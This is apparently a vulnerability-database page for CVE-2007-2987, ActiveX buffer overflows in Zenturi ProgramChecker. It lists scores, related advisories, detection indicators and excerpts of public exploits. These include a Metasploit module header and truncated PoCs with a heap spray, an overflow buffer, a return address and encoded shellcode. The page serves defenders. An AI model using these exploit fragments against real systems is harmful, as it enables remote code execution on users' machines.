CVE-2007-2987
Published 2007-06-01
Priority P269 · critical · 9.3 · CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 32.70% (98.1st percentile)
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zenturi | zenturi_programchecker | — | — |
| zenturi | zenturi_programchecker | — | — |
Detection & IOCs (extracted from sources)
Bytes: %AA%A2%39%7E
- Monitor ActiveX instantiation of sasatl.dll (version 1.5.0.531) in browser processes; calls to the DownloadFile method dropping executables into the Startup folder are indicative of exploitation.
- Detect the heap-spray pattern targeting address 0x0c0c0c0c with a NOP sled (%u9090%u9090) in browser memory, characteristic of the Scan() method exploit.
- Detect use of the DebugMsgLog method on the sasatl.dll ActiveX control with oversized buffer arguments (838+ 'A' characters) followed by a return address, indicating stack-based buffer overflow exploitation.
- The Metasploit exploit module serves a malicious HTML page with Content-Type application/octet-stream for the payload stage; detect HTTP responses of this type originating from exploit infrastructure.
- The CVE-2007-2987 vulnerability is specifically tied to sasatl.dll version 1.5.0.531; other versions may not be affected by the DownloadFile/arbitrary file write vector.
- CVE-2007-3703 (Fill method stack overflow in sasatl.dll 1.5.0.531) is noted as a distinct issue from CVE-2007-2987; do not conflate the two when writing detection rules.
- The PoC exploits were tested specifically on Windows XP Professional SP2 with Internet Explorer 7; detection coverage on other platforms may vary.
CVSS provenance
- NVD: CVSS v2.0 9.3 CRITICAL (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- VulnCheck: 9.3 CRITICAL
GHSA
GHSA-5jh3-6rj9-m2g2: Multiple buffer overflows in certain ActiveX controls in sasatl
ghsa_unreviewed · 2022-05-01
CVE-2007-2987 [HIGH] CWE-119
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
GHSA
GHSA-4xh3-2gh4-x6h4: Stack-based buffer overflow in a certain ActiveX control in sasatl
ghsa_unreviewed · 2022-05-01 · CVSS 9.3
CVE-2007-3703 [CRITICAL]
Stack-based buffer overflow in a certain ActiveX control in sasatl.dll 1.5.0.531 in Zenturi Program Checker (ProgramChecker) Pro allows remote attackers to execute arbitrary code via a long argument to the Fill method. NOTE: this is probably a different issue than CVE-2007-2987.
GHSA
GHSA-6xjq-wfj9-v6x3: Buffer overflow in a certain ActiveX control in the NixonMyPrograms class in sasatl
ghsa_unreviewed · 2022-05-01 · CVSS 9.3
CVE-2007-3984 [CRITICAL]
Buffer overflow in a certain ActiveX control in the NixonMyPrograms class in sasatl.dll 1.5.0.531 in Zenturi ProgramChecker allows remote attackers to execute arbitrary code via a long argument to the Scan method. NOTE: this is probably a different issue than CVE-2007-2987.
VulnCheck
zenturi zenturi_programchecker: Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2007 · CVSS 9.3
CVE-2007-2987 [CRITICAL]
Multiple buffer overflows in certain ActiveX controls in sasatl.dll in Zenturi ProgramChecker allow remote attackers to execute arbitrary code via unspecified vectors, possibly involving the (1) DebugMsgLog or (2) DoFileProperties methods.
Affected: zenturi zenturi_programchecker
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)
exploitdb · 2010-11-24
CVE-2007-2987
---
```ruby
##
# $Id: zenturiprogramchecker_unsafe.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# The copy of this module on the page lost the text between "Metasploit3" and
# the 'Name' value; the class declaration and initialize/super(update_info(...))
# lines below are the standard Metasploit 3 module layout, restored so the
# listing parses up to the point where the page truncates it.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zenturi ProgramChecker ActiveX Control Arbitrary File Download',
      'Description'    => %q{
          This module allows remote attackers to place arbitrary files on a user's file system
        via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'Version'        => '$Revision: 11127 $',
      'References'     =>
      # (listing truncated here in the source)
```
Exploit-DB
Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow
exploitdb · 2007-07-23
CVE-2007-3984
---
Zenturi NixonMyPrograms Class (sasatl.dll v. 1.5.0.531) "Scan()" Method
Remote Buffer Overflow Exploit (Heap Spray Technique)
url: http://www.programchecker.com/activeintro.aspx
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This exploit executes calc.exe

```javascript
// Shellcode as embedded in the PoC page; the listing is truncated here in the source
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u3
```
Exploit-DB
Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow
exploitdb · 2007-06-01
CVE-2007-2987
---
Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
url: http://www.programchecker.com/activeintro.aspx
original advisory: http://secunia.com/advisories/25473/
Will Dormann, CERT/CC, is credited with the discovery of these issues
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

```vbscript
' VBScript PoC body as embedded in the HTML page; the listing is truncated here in the source
Sub tryMe()
buff = String(838, "A")
get_EIP = unescape("%AA%A2%39%7E") 'call ESI from user32.dll
nop = String(1648,unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%4
```
Metasploit
Zenturi ProgramChecker ActiveX Control Arbitrary File Download
metasploit
This module allows remote attackers to place arbitrary files on a user's file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.
No writeups or analysis indexed.
References
- http://osvdb.org/36715
- http://secunia.com/advisories/25473
- http://www.kb.cert.org/vuls/id/603529
- http://www.securityfocus.com/bid/24217
- http://www.securityfocus.com/bid/24274
- http://www.vupen.com/english/advisories/2007/1977